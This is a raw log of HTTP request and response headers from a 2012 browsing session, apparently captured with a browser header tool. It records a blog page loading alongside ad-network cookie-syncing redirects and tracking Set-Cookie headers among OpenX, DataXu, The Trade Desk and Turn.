Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083; OX_pd=66482baa-af6b-11e1-8f8e-842b2b080a35.1353097485|d095054c-b000-11e1-8f8e-842b2b080a35.1353097485|5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097485|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097485
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_pd=66482baa-af6b-11e1-8f8e-842b2b080a35.1353097485|d095054c-b000-11e1-8f8e-842b2b080a35.1353097485|9f70892c-af6b-11e1-8f8e-842b2b080a35.1353097486|5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097485|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097485|8fefee7a-af6b-11e1-8f8e-842b2b080a35.1353097486; Version=1; Expires=Sat, 01-Dec-2012 20:24:46 GMT; Max-Age=1296000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Date: Fri, 16 Nov 2012 20:24:46 GMT
Content-Length: 320
Connection: close
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0Mnxsdz0xNDQxfGFpZD02NjExNTB8cHViPTY3ODU0fGxpZD0zNDczMzh8dD0yfHJpZD04MTVjNDRiOC1mNmEwLTQ2NjUtYThjNS0xMTNkNDc5YWJmYjF8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTY1MDAwMHxhYz1VU0R8cG09UFJJQ0lORy5DUEF8bGM9MnxydD0xMzUzMDk3NDg0fHByPTY1MDAwMHxhZHY9NjI5Nzc&cb=86260167 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0Mnxsdz0xNDQxfGFpZD02NjExNTB8cHViPTY3ODU0fGxpZD0zNDczMzh8dD0yfHJpZD04MTVjNDRiOC1mNmEwLTQ2NjUtYThjNS0xMTNkNDc5YWJmYjF8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTY1MDAwMHxhYz1VU0R8cG09UFJJQ0lORy5DUEF8bGM9MnxydD0xMzUzMDk3NDg0fHByPTY1MDAwMHxhZHY9NjI5Nzc&amp;cb=86260167 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309042&amp;cb=INSERT_RANDOM_NUMBER_HERE
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083; OX_pd=66482baa-af6b-11e1-8f8e-842b2b080a35.1353097485|d095054c-b000-11e1-8f8e-842b2b080a35.1353097485|5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097485|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097485
HTTP/1.1 200 OK

Content-Type: image/gif
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:46 GMT
Content-Length: 43
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /ping_match.gif?ei=OPENX&rurl=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed%26rtb%3D_wfivefivec_ HTTP/1.1

Host: i.w55c.net
GET /ping_match.gif?ei=OPENX&amp;rurl=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed%26rtb%3D_wfivefivec_ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Fri, 16 Nov 2012 20:24:46 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=5bfca5fc-d17e-4d1c-bb10-c2c52e49e487;Path=/;Domain=.w55c.net;Expires=Sun, 16-Nov-14 20:24:46 GMT
X-Version: DataXu Pixel Tracker v3.3 20120918
Cache-Control: private
P3P: policyref=&quot;https://cts.w55c.net/ct/p3p_policy_ref.xml&quot;, CP=&quot;UNI PUR COM INT STA OTC STP OUR CUR TAIo COR DSP NOI&quot;
Content-Length: 0
Location: http://r.openx.net/set?pid=6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed&amp;rtb=5bfca5fc-d17e-4d1c-bb10-c2c52e49e487
Via: 1.1 cdg034168010000 (MII-APC/2.2)
Keep-Alive: timeout=2
Connection: Keep-Alive
GET /track/cmf/openx?oxid=e92e032a-8587-7aab-d01f-41530ca0f593 HTTP/1.1

Host: match.adsrvr.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Found

Content-Type: text/html
Cache-Control: private,no-cache, must-revalidate
Date: Fri, 16 Nov 2012 20:24:46 GMT
Location: http://match.adsrvr.org/track/cmb/openx?oxid=e92e032a-8587-7aab-d01f-41530ca0f593
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: TDID=a2965aa8-4ffd-40fc-a273-5e4e8f472e41; domain=.adsrvr.org; expires=Sat, 16-Nov-2013 20:24:46 GMT; path=/ TDCPM=CAEYBSgCMgsIzsTBksmWiTAQBQ==; domain=.adsrvr.org; expires=Sat, 16-Nov-2013 20:24:46 GMT; path=/
X-AspNet-Version: 4.0.30319
Content-Length: 193
Connection: keep-alive
GET /set?pid=6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed&rtb=5bfca5fc-d17e-4d1c-bb10-c2c52e49e487 HTTP/1.1

Host: r.openx.net
GET /set?pid=6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed&amp;rtb=5bfca5fc-d17e-4d1c-bb10-c2c52e49e487 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:46 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; expires=Sun, 16-Nov-2014 20:24:46 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /track/cmb/openx?oxid=e92e032a-8587-7aab-d01f-41530ca0f593 HTTP/1.1

Host: match.adsrvr.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: TDID=a2965aa8-4ffd-40fc-a273-5e4e8f472e41; TDCPM=CAEYBSgCMgsIzsTBksmWiTAQBQ==
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: private,no-cache, must-revalidate
Date: Fri, 16 Nov 2012 20:24:46 GMT
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: TDID=a2965aa8-4ffd-40fc-a273-5e4e8f472e41; domain=.adsrvr.org; expires=Sat, 16-Nov-2013 20:24:46 GMT; path=/ TDCPM=CAESFAoFb3BlbngSCwjE3fflspaJMBAFGAU=; domain=.adsrvr.org; expires=Sat, 16-Nov-2013 20:24:46 GMT; path=/
X-AspNet-Version: 4.0.30319
Content-Length: 70
Connection: keep-alive
GET /favicon.ico HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __utma=219600389.500547520.1353097483.1353097483.1353097483.1; __utmb=219600389; __utmc=219600389; __utmz=219600389.1353097483.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Fri, 16 Nov 2012 20:25:02 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:07:11 GMT
Accept-Ranges: bytes
Content-Length: 894
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /idevaffiliate/banners/9.jpg HTTP/1.1

Host: www.linkxl.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/


GET /bejeweled-begone/ HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
X-Moz: prefetch
Cookie: __utma=219600389.500547520.1353097483.1353097483.1353097483.1; __utmb=219600389; __utmc=219600389; __utmz=219600389.1353097483.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 16 Nov 2012 20:24:46 GMT
Server: Apache
X-Pingback: http://www.meridiancrest.com/xmlrpc.php
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /r/du/id/L21rdC8xL21jaHBpZC8x HTTP/1.1

Host: r.turn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3592403702218291627; Domain=.turn.com; Expires=Wed, 15-May-2013 20:24:46 GMT; Path=/ rrs=1006%7C1004%7C1002%7C9; Domain=.turn.com; Expires=Wed, 15-May-2013 20:24:46 GMT; Path=/ rds=15660%7C15660%7C15660%7C15660; Domain=.turn.com; Expires=Wed, 15-May-2013 20:24:46 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3592403702218291627/mchpid/1/url/http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3592403702218291627/mchpid/1/url/http://r.openx.net/set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3592403702218291627
Transfer-Encoding: chunked
Date: Fri, 16 Nov 2012 20:24:46 GMT